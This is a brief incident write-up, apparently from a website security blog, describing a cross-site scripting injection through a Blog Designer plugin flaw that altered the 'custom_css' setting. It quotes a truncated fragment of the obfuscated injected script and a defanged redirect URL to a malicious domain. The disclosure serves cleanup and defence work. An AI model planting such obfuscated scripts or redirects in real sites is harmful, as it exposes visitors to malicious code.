Cross-Site Scripting with Blog Designer Plugin

This time we had to clear out a database injection, caused by a Blog Designer plugin vulnerability. It was fairly simple to to locate the malicious script – it was added by changing “custom_css” value.

Sample code:

script language=javascript>eval(String.fromCharCode(118, 97, 114

Users were directed to: hxxps://stats.garrygudini[.]com/flask.js?t=t& ; domain is now blacklisted by ESET, McAfee and Sucuri Labs.